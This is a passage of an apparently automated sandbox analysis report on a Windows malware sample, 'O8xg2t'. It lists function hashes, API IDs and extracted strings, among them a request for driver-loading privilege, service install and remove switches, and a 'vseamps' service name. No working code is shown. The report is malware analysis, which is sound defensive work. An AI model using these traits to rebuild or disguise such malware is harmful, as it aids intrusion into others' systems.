                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                  • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction ID: 300e9d97a577a314a47ad2e2211157d91ddeddf12184fe1fc4cbce8b89e43a02
                                  • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction Fuzzy Hash: 35114C62B14B058AEF00DF70E8446B933B4F719758F881A31EA2D5A7A4DF38D558C340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$CriticalInitializeSection
                                  • String ID:
                                  • API String ID: 926662266-0
                                  • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                  • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: __except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 1467352782-3733052814
                                  • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction ID: 6a6fe900e328f622ca646d5f10fb0187f6ca9576bd3fd161c0433466bdc761ca
                                  • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction Fuzzy Hash: ED7183B250C68186DF60AF35D484B7E7BA0FB04B84F688136DE8C6BA89CB3CD459C744
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateFrameInfo__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2558813199-1018135373
                                  • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction ID: 7100c86260c25f067104827c3bdd9f4bcb5c84eed2f601bcd04d953338ea06f4
                                  • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction Fuzzy Hash: B15162B261874196DA20FF25E080A6E77A4FB89B90F980134EB8D1BB55CF3CE465CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction ID: 08781e5ee7fbf188fe9f3d7044082d468bb2cdb0a6998a669b7902f3765ae6e6
                                  • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction Fuzzy Hash: 4741B2B2A19A4181DF20EF75E4447AA77A0FB88794F884131EE4E9B794DF3CD445CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID: csm
                                  • API String ID: 3997070919-1018135373
                                  • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                  • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                  APIs
                                    • Part of subcall function 00007FFBC3203A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC3203A63
                                  • __GSHandlerCheckCommon.LIBCMT ref: 00007FFBC3210993
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CheckCommonHandler__except_validate_context_record
                                  • String ID: csm$f
                                  • API String ID: 1543384424-629598281
                                  • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction ID: d1f53d47c39e8afceb262e2fd35fa0d2909f5c2b02845ddf3923135eccfc676f
                                  • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction Fuzzy Hash: A211AF72A1878585EB50AF32E5819AAB764EB45FC4F8C8035EF882FB56CE38D851C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-484248852
                                  • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                  • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                  APIs
                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC32039E0
                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC3203A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                   • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction ID: 8794dc55e629af33f632151be59851f87d6bb74f3517eeb7756924e450a3536b
                                  • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction Fuzzy Hash: 61115E72618B4582EB209F25E44066A77E4FB88B84F984230EFCD1BB58DF3CD555CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-3336177065
                                  • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                  • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                  • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                  Execution Graph

                                  Execution Coverage:2.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:462
                                  Total number of Limit Nodes:10
                                  execution_graph

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                  • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: File$CreateReadmalloc
                                  • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                  • API String ID: 3950102678-3381721293
                                  • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                  • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction ID: df331209a9c2bac8a3253438dec6de374fb007abf8271c7ad2a000f1697e5e95
                                  • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction Fuzzy Hash: 8A819EE9F0E64346FB94AF75D44127B2390AF46780F44A475EA4DB7B92EE3CE8458E00

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                  • String ID: WordpadFilter.db
                                  • API String ID: 868324331-3647581008
                                  • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction ID: 499664675e561f705db1643c849e155e848709e424c5061f75918aed4bc41ac7
                                  • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction Fuzzy Hash: 1E31AC76B16B4189E740CFB1D8502AE73B5EB89788F449635EE8C23B04EF38D192C740

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 73155330-0
                                  • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction ID: f7ddcc1b4e6e24180819d165e06d4786e210984f327d2f4bc3191454cccebfa3
                                  • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction Fuzzy Hash: 36812666B1A78245E7518F35D8401BAA794EF57BC4F149335EA9D73B82DF3CE0928B00

                                  Control-flow Graph (rendered image not extracted; legend: Executed / Not Executed)

                                  Function at 0x1400073e0; imported API call: LdrLoadDll.
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                  • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3526400053-0
                                  • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                  • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                  • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                  • API String ID: 3408796845-4213300970
                                  • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                  • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                  • String ID: ampStopSingletone: logging ended
                                  • API String ID: 2048888615-3533855269
                                  • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                  • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorLastManagerOpen$FileModuleName
                                  • String ID: /remove$/service$vseamps
